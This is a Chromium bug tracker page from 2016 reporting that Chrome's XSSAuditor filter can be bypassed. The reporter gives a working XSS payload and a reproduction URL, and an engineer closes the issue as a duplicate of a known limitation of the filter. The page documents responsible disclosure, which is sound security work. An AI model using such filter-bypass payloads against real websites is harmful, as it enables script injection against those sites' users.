New issue
Advanced search Search tips

Issue 597037 link

Starred by 1 user

Issue metadata

Status: Duplicate
Merged: issue 171114
Owner: ----
Closed: Mar 2016
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security



Sign in to add a comment

Security: XSS filter bypass in Chrome Browser

Reported by abeont...@gmail.com, Mar 22 2016

Issue description

The XSS vector below bypasses current filtering in the Chrome browser:
<script>void('&b=');alert(1);</script>

VERSION
Chrome Version: Version 49.0.2623.87 m - Google Chrome is up to date.
Operating System: [Please indicate OS, version, and service pack level]

REPRODUCTION CASE
http://securitee.tk/files/chrome_xss.php?a=<script>void('&b=');alert(1);</script>

 

Comment 1 by tsepez@chromium.org, Mar 22 2016

Mergedinto: 171114
Status: Duplicate (was: Unconfirmed)
Thanks for the report.  This is one of those known cases XSSAuditor can't filter (multiple vulnerable parameters).
Project Member

Comment 2 by sheriffbot@chromium.org, Jun 29 2016

Labels: -Restrict-View-SecurityTeam
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 3 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 4 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic

Sign in to add a comment